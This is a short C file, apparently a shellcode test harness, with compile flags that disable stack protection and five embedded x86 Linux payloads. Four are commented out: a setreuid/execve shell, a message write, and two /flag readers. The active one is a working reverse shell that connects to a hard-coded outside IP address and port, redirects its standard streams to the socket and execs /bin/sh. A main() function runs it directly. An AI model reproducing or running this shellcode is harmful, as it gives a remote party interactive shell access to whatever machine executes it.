/*
 * borja@libcrack.so
 * gcc -m32 -z execstack -fno-stack-protector -o tester tester.c
 *
 */

#include <stdlib.h>

// char shellcode[] = "\x31\xc0\xb0\x46\x31\xc9\x31\xdb\xcd\x80\xeb\x18\x5b"\
//                    "\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x31\xc0"\
//                    "\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe3\xff"\
//                    "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

// unsigned char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x0f\x59\xb0\x04\xb3\x01\xb2\x0e\xcd\x80\xb0\x01\xb3\x01\xcd\x80\xe8\xec\xff\xff\xff\x68\x6f\x6c\x61\x20\x63\x6f\x6d\x70\x61\x64\x72\x65\x0a";

// unsigned char shellcode[] =
//             "\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
//             "\xeb\x32\x5b\xb0\x05\x31\xc9\xcd"
//             "\x80\x89\xc6\xeb\x06\xb0\x01\x31"
//             "\xdb\xcd\x80\x89\xf3\xb0\x03\x83"
//             "\xec\x01\x8d\x0c\x24\xb2\x01\xcd"
//             "\x80\x31\xdb\x39\xc3\x74\xe6\xb0"
//             "\x04\xb3\x01\xb2\x01\xcd\x80\x83"
//             "\xc4\x01\xeb\xdf\xe8\xc9\xff\xff"
//             "\xff"
//             "/flag";

//unsigned char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x31\x5b\xb0\x05\x31\xc9\xcd\x80\x89\xc6\xeb\x06\xb0\x01\x31\xdb\xcd\x80\x89\xf3\xb0\x03\x83\xec\x01\x89\xe1\xb2\x01\xcd\x80\x31\xdb\x39\xc3\x74\xe7\xb0\x04\xb3\x01\xb2\x01\xcd\x80\x83\xc4\x01\xeb\xe0\xe8\xca\xff\xff\xff\x66\x6c\x61\x67";

unsigned char shellcode[] = 
        "\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
        "\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x31\xc9\x51\x51"
        "\x68\x25\xbb\x16\xa6\x66\x68\x15\xb3\xb1\x02\x66\x51\x89\xe7\xb3"
        "\x10\x53\x57\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1"
        "\x74\x06\x31\xc0\xb0\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3\xcd\x80"
        "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\x89\xd3"
        "\xb1\x02\xcd\x80\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f"
        "\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0"
        "\x01\xcd\x80";


int main (int argc, char **argv)
{
    int (*ret)();              
    ret = (int(*)())shellcode; 
    (int)(*ret)();             
    exit(0);                   
}

